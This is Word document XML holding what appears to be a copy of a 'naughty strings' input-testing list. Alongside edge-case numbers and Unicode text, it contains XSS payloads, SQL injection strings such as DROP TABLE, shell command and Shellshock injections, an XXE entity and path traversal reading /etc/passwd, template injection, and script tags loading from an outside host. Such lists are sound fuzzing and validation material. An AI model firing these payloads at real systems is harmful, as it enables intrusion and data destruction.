        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xEF\xBF\xBEjavascript:alert(156)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x80javascript:alert(157)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x21javascript:alert(158)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x82javascript:alert(159)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x86javascript:alert(160)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE1\xA0\x8Ejavascript:alert(161)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x0Bjavascript:alert(162)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x20javascript:alert(163)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xC2\xA0javascript:alert(164)&lt;/script&gt; | &lt;img \x00src=x onerror="alert(165)"&gt; | &lt;img \x47src=x onerror="javascript:alert(166)"&gt; | &lt;img \x11src=x onerror="javascript:alert(167)"&gt; | &lt;img \x12src=x onerror="javascript:alert(168)"&gt; | &lt;img\x47src=x onerror="javascript:alert(169)"&gt; | &lt;img\x10src=x onerror="javascript:alert(170)"&gt; | &lt;img\x13src=x onerror="javascript:alert(171)"&gt; | &lt;img\x32src=x onerror="javascript:alert(172)"&gt; | &lt;img\x47src=x onerror="javascript:alert(173)"&gt; | &lt;img\x11src=x onerror="javascript:alert(174)"&gt; | &lt;img \x47src=x onerror="javascript:alert(175)"&gt; | &lt;img \x34src=x onerror="javascript:alert(176)"&gt; | &lt;img \x39src=x onerror="javascript:alert(177)"&gt; | &lt;img \x00src=x onerror="javascript:alert(178)"&gt; | &lt;img src\x09=x onerror="javascript:alert(179)"&gt; | &lt;img src\x10=x onerror="javascript:alert(180)"&gt; | &lt;img src\x13=x onerror="javascript:alert(181)"&gt; | &lt;img src\x32=x onerror="javascript:alert(182)"&gt; | &lt;img src\x12=x onerror="javascript:alert(183)"&gt; | &lt;img src\x11=x onerror="javascript:alert(184)"&gt; | &lt;img src\x00=x onerror="javascript:alert(185)"&gt; | &lt;img src\x47=x onerror="javascript:alert(186)"&gt; | &lt;img src=x\x09onerror="javascript:alert(187)"&gt; | &lt;img src=x\x10onerror="javascript:alert(188)"&gt; | &lt;img src=x\x11onerror="javascript:alert(189)"&gt; | &lt;img src=x\x12onerror="javascript:alert(190)"&gt; | &lt;img src=x\x13onerror="javascript:alert(191)"&gt; | &lt;img[a][b][c]src[d]=x[e]onerror=[f]"alert(192)"&gt; | &lt;img src=x onerror=\x09"javascript:alert(193)"&gt; | &lt;img src=x onerror=\x10"javascript:alert(194)"&gt; | &lt;img src=x onerror=\x11"javascript:alert(195)"&gt; | &lt;img src=x onerror=\x12"javascript:alert(196)"&gt; | &lt;img src=x onerror=\x32"javascript:alert(197)"&gt; | &lt;img src=x onerror=\x00"javascript:alert(198)"&gt; | &lt;a href=java&amp;#1&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#11&amp;#12script:javascript:alert(199)&gt;XXX&lt;/a&gt; | &lt;img src=“x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;javascript:alert(200)&lt;/script&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; | &lt;img src onerror /” '"= alt=javascript:alert(201)//"&gt; | &lt;title onpropertychange=javascript:alert(202)&gt;&lt;/title&gt;&lt;title title=&gt; | &lt;a href=http://foo.bar/#x=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">y&gt;&lt;/a&gt;&lt;img alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&lt;img src=x:x onerror=javascript:alert(203)&gt;&lt;/a&gt;"&gt; | &lt;!--[if]&gt;&lt;script&gt;javascript:alert(204)&lt;/script --&gt; | &lt;!--[if&lt;img src=x onerror=javascript:alert(205)//]&gt; --&gt; | &lt;script src="/\%(jscript)s"&gt;&lt;/script&gt; | &lt;script src="\\%(jscript)s"&gt;&lt;/script&gt; | &lt;IMG """&gt;&lt;SCRIPT&gt;alert(“206”)&lt;/SCRIPT&gt;"&gt; | &lt;IMG SRC=javascript:alert(String.fromCharCode(50,48,55))&gt; | &lt;IMG SRC=# onmouseover="alert('208')"&gt; | &lt;IMG SRC= onmouseover="alert(‘209’)"&gt; | &lt;IMG onmouseover="alert('210')"&gt; | &lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#50;&amp;#49;&amp;#49;&amp;#39;&amp;#41;&gt; | &lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000050&amp;#0000049&amp;#0000050&amp;#0000039&amp;#0000041&gt; | &lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x32&amp;#x31&amp;#x33&amp;#x27&amp;#x29&gt; | &lt;IMG SRC="jav   ascript:alert('214');"&gt; | &lt;IMG SRC="jav&amp;#x09;ascript:alert('215');"&gt; | &lt;IMG SRC="jav&amp;#x0A;ascript:alert('216');"&gt; | &lt;IMG SRC="jav&amp;#x0D;ascript:alert('217');"&gt; | perl -e ‘print "&lt;IMG SRC=java\0script:alert("218")&gt;";’ &gt; out | &lt;IMG SRC=" &amp;#14;  javascript:alert('219');"&gt; | &lt;SCRIPT/XSS SRC=“http://ha.ckers.org/xss.js”&gt;&lt;/SCRIPT&gt; | &lt;BODY onload!#$%&amp;()~+-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.,:;?@[/|]^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">=alert("220")&gt; | &lt;SCRIPT/SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt; | &lt;&lt;SCRIPT&gt;alert("221");//&lt;&lt;/SCRIPT&gt; | &lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt; B &gt; | &lt;SCRIPT SRC=//ha.ckers.org/.j&gt; | &lt;IMG SRC="javascript:alert('222')" | &lt;iframe src=http://ha.ckers.org/scriptlet.html &lt; | \";alert('223');// | &lt;u oncopy=alert()&gt; Copy me&lt;/u&gt; | &lt;i onwheel=alert(224)&gt; Scroll over me &lt;/i&gt; | &lt;plaintext&gt; | http://a/%%30%30 | &lt;/textarea&gt;&lt;script&gt;alert(225)&lt;/script&gt; | 1;DROP TABLE users | 1'; DROP TABLE users-- 1 | ' OR 1=1 -- 1 | ' OR '1'='1 | '; EXEC sp_MSForEachTable 'DROP TABLE ?'; -- |   | % | _ | - | -- | --version | --help | $USER | /dev/null; touch /tmp/blns.fail ; echo | </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">touch /tmp/blns.fail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">| $(touch /tmp/blns.fail) | @{[system "touch /tmp/blns.fail"]} | eval("puts 'hello world'") | System("ls -al /") |</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ls -al /` | Kernel.exec("ls -al /") | Kernel.exit(1) | %x(‘ls -al /') | &lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;&lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY &gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt; | $HOME | $ENV{‘HOME’} | %d | %s%s%s%s%s | {0} | %*.*s | %@ | %n | File:/// | ../../../../../../../../../../../etc/passwd%00 | ../../../../../../../../../../../etc/hosts | () { 0; }; touch /tmp/blns.shellshock1.fail; | () { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">; } &gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[$($())] { touch /tmp/blns.shellshock2.fail; } | &lt;&lt;&lt; %s(un='%s’) = %u | +++ATH0 | CON | PRN | AUX | CLOCK$ | NUL | A: | ZZ: | COM1 | LPT1 | LPT2 | LPT3 | COM2 | COM3 | COM4 | DCC SEND STARTKEYLOGGER 0 0 0 | Scunthorpe General Hospital | Penistone Community Church | Lightwater Country Park | Jimmy Clitheroe | Horniman Museum | shitake mushrooms | RomansInSussex.co.uk | http://www.cum.qc.ca/ | Craig Cockburn, Software Specialist | Linda Callahan | Dr. Herman I. Libshitz | magna cum laude | Super Bowl XXX | medieval erection of parapets | evaluate | mocha | expression | Arsenal canal | classic | Tyson Gay | Dick Van Dyke | basement | If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you. | Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue | But now...[20Cfor my greatest trick...[8m | The quick brown fox… [Beeeep] | Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 | 🏳0🌈️ | జ్ఞ‌ా | گچپژ | {% print ‘x’ * 64 * 1024**3 %} | {{ "".</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[2].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">subclasses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="DeterministicId1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">40</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.read() }} | En dash – | Em dash — | Horizontal bar ― | Figure dash ‒ | Swung dash ⁓ | Single opening quote ‘ | Single closing quote ’ | Double opening quote “ | Double closing quote ” | Copyright © | Registered ® | Trademark ™ | Section § | Paragraph ¶ | Ellipsis … | Optional hyphen ¬ | Non-breaking hyphen ߛ | Em space ߓ | En space ߒ | Quarter space ߕ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">undefined</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">undef</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">NULL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">(null)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">NIL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TRUE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">FALSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">None</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">hasOwnProperty</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">constructor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">$1.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1/2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1E2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1E02</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1E+02</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-1.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-$1.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-1/2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-1E2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-1E02</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-1E+02</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1/0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0/0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-2147483648/-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-9223372036854775808/-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">+0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">+0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0..0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0,00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0,,0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0,0,0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0.0/0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1.0/0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0.0/0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1,0/0,0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0,0/0,0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">–1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">NaN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Infinity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-Infinity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">INF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1#INF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-1#IND</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1#QNAN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1#SNAN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1#IND</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0x0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0xffffffff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0xffffffffffffffff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0xabad1dea</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">123456789012345678901234567890123456789</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1,000.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1 000.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1'000.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1,000,000.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1 000 000.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1'000'000.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1.000,00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1 000,00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1'000,00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1.000.000,00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1 000 000,00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1'000'000,00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">01000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">08</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">09</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2.2250738585072011e-308</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">,./;'[]-=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;&gt;?:"|_+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">!@#$%^&amp;*()`~</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">\t \u0085             ​\u2028\u2029</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">­؀؁؂؃؄؅؜۝܏᠎​‌‍‎‏‪‫‬‭‮⁠⁡⁢⁣⁤⁦⁧⁨⁩⁪⁫⁬⁭⁮⁯﻿￹￺￻𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵󠀶󠀷󠀸󠀹󠀺󠀻󠀼󠀽󠀾󠀿󠁀󠁁󠁂󠁃󠁄󠁅󠁆󠁇󠁈󠁉󠁊󠁋󠁌󠁍󠁎󠁏󠁐󠁑󠁒󠁓󠁔󠁕󠁖󠁗󠁘󠁙󠁚󠁛󠁜󠁝󠁞󠁟󠁠󠁡󠁢󠁣󠁤󠁥󠁦󠁧󠁨󠁩󠁪󠁫󠁬󠁭󠁮󠁯󠁰󠁱󠁲󠁳󠁴󠁵󠁶󠁷󠁸󠁹󠁺󠁻󠁼󠁽󠁾󠁿</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">﻿</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ω≈ç√∫˜µ≤≥÷</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">åß∂ƒ©˙∆˚¬…æ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">œ∑´®†¥¨ˆøπ“‘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">¡™£¢∞§¶•ªº–≠</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">¸˛Ç◊ı˜Â¯˘¿</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ÅÍÎÏ˝ÓÔÒÚÆ☃</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Œ„´‰ˇÁ¨ˆØ∏”’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`⁄€‹›ﬁﬂ‡°·‚—±</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">⅛⅜⅝⅞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">٠١٢٣٤٥٦٧٨٩</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">⁰⁴⁵</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">₀₁₂</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">⁰⁴⁵₀₁₂</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">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 ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">“”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">‘"’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">“''''"'”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">“'"'"''''”</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;foo val=`bar' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">田中さんにあげて下さい</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">パーティーへ行かないか</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">和製漢語</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">部落格</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">사회과학원 어학연구소</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">찦차를 타고 온 펲시맨과 쑛다리 똠방각하</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">社會科學院語學研究所</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">울란바토르</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𠜎𠜱𠝹𠱓𠱸𠲖𠳏</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𐐜 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐙𐐊𐐡𐐝𐐓/𐐝𐐇𐐗𐐊𐐤𐐔 𐐒𐐋𐐗 𐐒𐐌 𐐜 𐐡𐐀𐐖𐐇𐐤𐐓𐐝 𐐱𐑂 𐑄 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐏𐐆𐐅𐐤𐐆𐐚𐐊𐐡𐐝𐐆𐐓𐐆</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ポ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">あ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">鷗</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Œ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">é</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ｂ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">逍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ü</w:t>
